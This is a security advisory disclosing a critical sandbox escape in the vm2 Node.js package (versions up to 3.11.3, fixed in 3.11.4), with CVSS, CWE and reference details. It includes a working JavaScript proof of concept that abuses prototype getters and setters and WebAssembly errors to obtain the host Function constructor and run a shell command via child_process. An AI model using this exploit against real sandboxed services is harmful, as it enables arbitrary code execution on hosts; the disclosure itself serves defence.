vm2 has a Sandbox Escape issue

### Summary By combining `Buffer.call.call({}.__lookupGetter__, Buffer, "__proto__")`, `Buffer.call.call({}.__lookupSetter__, Buffer, "__proto__")`, and Node.js's `ERR_INVALID_ARG_TYPE` Error, the host's `TypeError` constructor can be obtained, which allows the escape from the sandbox. This allows attackers to run arbitrary code. ### PoC ```js "use strict"; const { VM } = require("vm2"); const vm = new VM(); vm.run(` "use strict"; const getProto = Buffer.call.call({}.__lookupGetter__, Buffer, "__proto__"); const setProto = Buffer.call.call({}.__lookupSetter__, Buffer, "__proto__"); async function f() { try { await WebAssembly.compileStreaming(); } catch(e) { setProto.call(getProto.call(e), null); } try { await WebAssembly.compileStreaming(); } catch(e) { const HostFunction = e.constructor.constructor; new HostFunction("return process")().mainModule.require("child_process").execSync("echo pwned", { stdio: "inherit" }); } } f(); `); ``` ### Impact Sandbox Escape → RCE Source Code Location: https://github.com/patriksimek/vm2 Affected Packages: - npm:vm2, affected <= 3.11.3, patched in 3.11.4 CWEs: - CWE-913: Improper Control of Dynamically-Managed Code Resources CVSS: - Primary: score 10.0, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - CVSS_V3: score 10.0, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H References: - https://github.com/patriksimek/vm2/security/advisories/GHSA-v6mx-mf47-r5wg - https://github.com/patriksimek/vm2/commit/27c525f4615e2b983f122e2bed327d810126f5c8 - https://github.com/patriksimek/vm2/releases/tag/v3.11.4 - https://github.com/advisories/GHSA-v6mx-mf47-r5wg